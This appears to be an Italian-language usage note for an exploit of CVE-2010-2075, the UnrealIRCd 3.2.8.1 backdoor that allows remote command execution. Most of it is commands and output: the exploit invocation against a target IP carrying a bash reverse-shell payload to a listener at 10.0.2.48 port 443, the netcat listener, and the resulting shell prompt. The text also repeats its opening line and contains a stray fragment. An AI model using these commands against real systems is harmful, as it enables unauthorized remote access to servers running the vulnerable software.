
Exploit per CVE:2010-2075. Questo exploit consente l'esecuzione remota di comandi in UnrealIRCd 3.2.8.1.
Exploit per CVE:2010-2075. Questo exploit consente l'esecuzione remota di comandi in UnrealIRCd 3.2.8.1.
optparse, signal
Puoi inviare un comando da eseguire, ma ci saranno momenti in cui non risponderà; in tal caso, puoi semplicemente inviare una reverse shell e attendere che arrivi.
python3 CVE-2010-2075.py -t 10.0.2.119 -p 6667 -c 'bash -c "bash -i >& /dev/tcp/10.0.2.48/443 0>&1"'
Creating connection
Creating payload
[*]Sending Payload...
E ho ricevuto la shell
nc -nlvp 443
listening on [any] 443 ...
connect to [10.0.2.48] from (UNKNOWN) [10.0.2.119] 56916
bash: cannot set terminal process group (415): Inappropriate ioctl for device
bash: no job control in this shell
server@real:~/irc/Unreal3.2$